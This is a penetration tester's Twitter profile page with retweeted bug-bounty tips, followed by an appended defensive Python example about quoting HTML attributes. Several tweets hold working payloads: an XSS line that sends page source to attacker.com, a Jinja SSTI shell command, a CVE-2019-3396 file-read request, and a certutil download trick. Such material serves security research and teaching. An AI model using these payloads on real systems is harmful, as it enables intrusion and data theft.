WenBin Kong

@kongwenbin

Penetration Tester | Bug Hunter. Blog: Learning never stops! My tweets are my own and have nothing to do with my employer.

Singapore
Joined May 2016

Tweets


  1. Pinned tweet
    31 Dec 2018

    I posted a review of my bug hunting journey so far, from when I just started, to the point where I made it into the Top 200 bug hunters on recently, after two years on the platform: URL: Happy New Year!

  2. 9 Jan

    Everyone is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid.

  3. Retweeted
    10 Oct 2019
    Replying to

    XSS isn't about alert(1). The payload below steals source code of the current webpage without triggering browser restrictions <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

  4. Retweeted
    9 Oct 2019

    One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s

  5. Retweeted

    Want more training apps? We hear you! We just released the MSTG-Android-Java & MSTG-Android-Kotlin for Android and the MSTG-JWT app for iOS. Come and check it out at ! With special thanks to , , , and !

  6. 19 Sep 2019

    Many people in Singapore have received this message via SMS: ``` Your courier has been sent out. Please check and accept it. ``` Hopefully people don't fall for it. It would even download a fake DHL APK file when you open the url 😑

  7. 6 Jul 2019

    This is brilliant! I could only last 30 seconds. I think it can make most people piss off though, not just designers.

  8. 31 May 2019

    Keep trying... 😑 somehow this was classified as an important email by Outlook and hence managed to get into the "Focused" section of my email inbox.

  9. Retweeted
    15 Apr 2019
  10. Retweeted
    15 Apr 2019
  11. Retweeted
    15 Apr 2019

    CVE-2019-3396 POC (h/t to ) POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {"contentId":"1245","macro":{"name":"widget","body":"","params":{"url":"…","width":"300","height":"200","_template":"file:///"}}}

  12. Retweeted
    9 Apr 2019

    Common ways to get RCE:
    - SSRF to Metadata
    - Jenkins /script
    - Jenkins Orange RCE
    - Leaked cloud creds/keys (online, via LFD, etc)
    - Arbitrary file upload
    - ImageTragik
    - SSTI
    Fill in how you've gotten RCE!

  13. Retweeted
    8 Apr 2019

    Remember, hunting on bug bounty programs isn’t a walk in, get cash, easy task. In most cases it’s some of the most hardened targets that you’re ever going to go up against. That requires a lot of thinking outside the box, coz the bugs&$ are there, but you will have to work for it

  14. 30 Mar 2019

    H1-65 was a huge blast! Honoured to meet some of the most amazing and talented bug hunters from around the world! Finally managed to map some of the Twitter handles to faces in real life 😂 Thanks & for making this happen!

  15. Retweeted
    28 Mar 2019

    Wow, this is a great payload for sites using Flask/Jinja: {{config.items()[4][1].__class__.__mro__[2].__subclasses__()[229](["touch /tmp/test"], shell=True) }} Simple pythonic ! Easiest Server-Side Template Injection.

  16. 27 Mar 2019

    Totally looking forward to meeting the super talented folks from all over the world tomorrow at ☺️

  17. Retweeted
    26 Mar 2019

    Only recently learned that you can use certutil to download files. certutil -urlcache -split -f http://file.txt c:\somewhere\file.txt Thanks for the tip.

  18. 27 Mar 2019

    Great thread on recon, thanks for getting this started. Looking forward to the video!

  19. 21 Mar 2019

    This is so important, everyone in should read this. - read this too!

  20. Retweeted
    17 Mar 2019

    Maybe it’s not obvious, so I’ll repeat it. Hackers and the community in general are here to help people and companies to fix their security issues. We are the nice guys in this story, we are helping people in the good way.

  21. Retweeted
    14 Mar 2019

    Sometimes user input is reflected into a value without any quotations. Eg:<input value={input}> Just add a space and you can now inject onfocus=alert(0) autofocus for XSS! Works even against htmlspecialchars().

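As an added defender's example (not code from the tweet or its author), the following Python, using only the standard library, shows why escaping alone does not protect an attribute that is rendered without quotes and how quoting the value closes that gap. The payload string is the one from the tweet; the `render_unquoted`, `render_quoted` and `parse_input_attrs` names are my own, and the parser is Python's tolerant `html.parser`, used here as a stand-in for how a browser splits a start tag into attributes.

```python
import html
from html.parser import HTMLParser


def render_unquoted(user_input: str) -> str:
    """Vulnerable pattern from the tweet: the value is escaped like
    htmlspecialchars() would escape it, but the attribute is not quoted,
    so a space terminates the value and the rest of the input is parsed
    as additional attributes (e.g. an onfocus handler)."""
    return f"<input value={html.escape(user_input)}>"


def render_quoted(user_input: str) -> str:
    """Hardened pattern: always quote attribute values and escape the
    quote characters inside them (html.escape with quote=True emits
    &quot; and &#x27;), so the value cannot break out of the attribute."""
    return f'<input value="{html.escape(user_input, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collect the attributes the parser assigns to the <input> start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            # attrs is a list of (name, value) pairs; value is None for
            # boolean attributes such as autofocus.
            self.attrs = dict(attrs)


def parse_input_attrs(markup: str) -> dict:
    """Parse markup the way a tolerant HTML parser does and return the
    attributes of the <input> element (entity-decoded values)."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def has_event_handler(markup: str) -> bool:
    """Detection helper: True when any on* handler attribute ended up on
    the rendered element, i.e. the input escaped the value attribute."""
    return any(name.startswith("on") for name in parse_input_attrs(markup))


if __name__ == "__main__":
    # Constructed input: the payload from the tweet (no quote characters,
    # so htmlspecialchars-style escaping leaves it untouched).
    payload = "x onfocus=alert(0) autofocus"
    for render in (render_unquoted, render_quoted):
        markup = render(payload)
        print(markup, "->", parse_input_attrs(markup),
              "| handler injected:", has_event_handler(markup))
```

Run as a script it prints the two renderings side by side: the unquoted one yields three attributes (`value`, `onfocus`, `autofocus`), the quoted one a single `value` attribute containing the whole string. The same check works as a lightweight unit test in a template review: render untrusted input through every attribute context and assert that no `on*` attribute appears.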
